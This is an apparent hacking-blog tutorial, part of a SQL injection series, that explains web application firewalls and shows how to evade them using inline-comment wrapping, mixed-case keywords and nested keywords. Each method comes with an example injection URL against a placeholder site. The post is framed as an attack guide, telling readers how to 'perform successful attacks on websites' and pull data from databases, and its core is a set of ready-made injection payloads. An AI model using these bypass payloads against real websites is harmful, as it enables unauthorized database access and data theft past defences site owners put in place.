In my previous posts, i have explained about different types of
SQL injections. Some times, when we try to retrieve data from
SQLi vulnerable websites, we end up with forbidden error. Today i will explain why you get such errors and
how you can bypass such errors and perform successful attacks on websites. If you have not read my previous posts and if you are new to
SQLi, I would suggest you to read them before proceeding.
You can read them from here.
- SQL Injection Tutorial -Part1
- SQL Injection Part 2
- SQL Injection Part 3 - Blind Sql Injection
- SQL Injection part 4 with SQLMAP
What is WAF? WAF stands for
Web Application Firewall. In order to prevent the attacks such as
SQLi and
XSS, administrators put Web Application Firewalls. These WAFs detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable and can be easily bypassed.
How it works??When the
WAF detects malicious attempts, our input URL gives a
forbidden error as shown in the following figure.
Our aim is
to bypass this error and need to retrieve data from the database using some special techniques. There are many methods to bypass WAF. In this tutorial, i am going to show you some basic methods. These methods are especially for beginners.
Methods To Bypass WAFComments :-Comments allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query.
Actual queryhttp://vulnerablesite.com/detail.php?id=44 union all select 1,2,3,4,5—
Query To Bypass the WAFhttp://vulnerablesite.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—
Capitalization Of Functions:-Some WAF’s will filter only lowercase alphabets, So we can easily evade this by case changing.
Actual queryhttp://vulnerablesite.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—
Replaced Keywords:-Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.
Actual queryhttp://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
Query to bypass the WAFhttp://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--
Hope you liked this article. Feel free to leave your comments for further
doubts and
clarifications.Read more: http://www.101hacker.com/2011/11/sql-injections-part-5-bypassing-waf.html#ixzz1lawTrV8h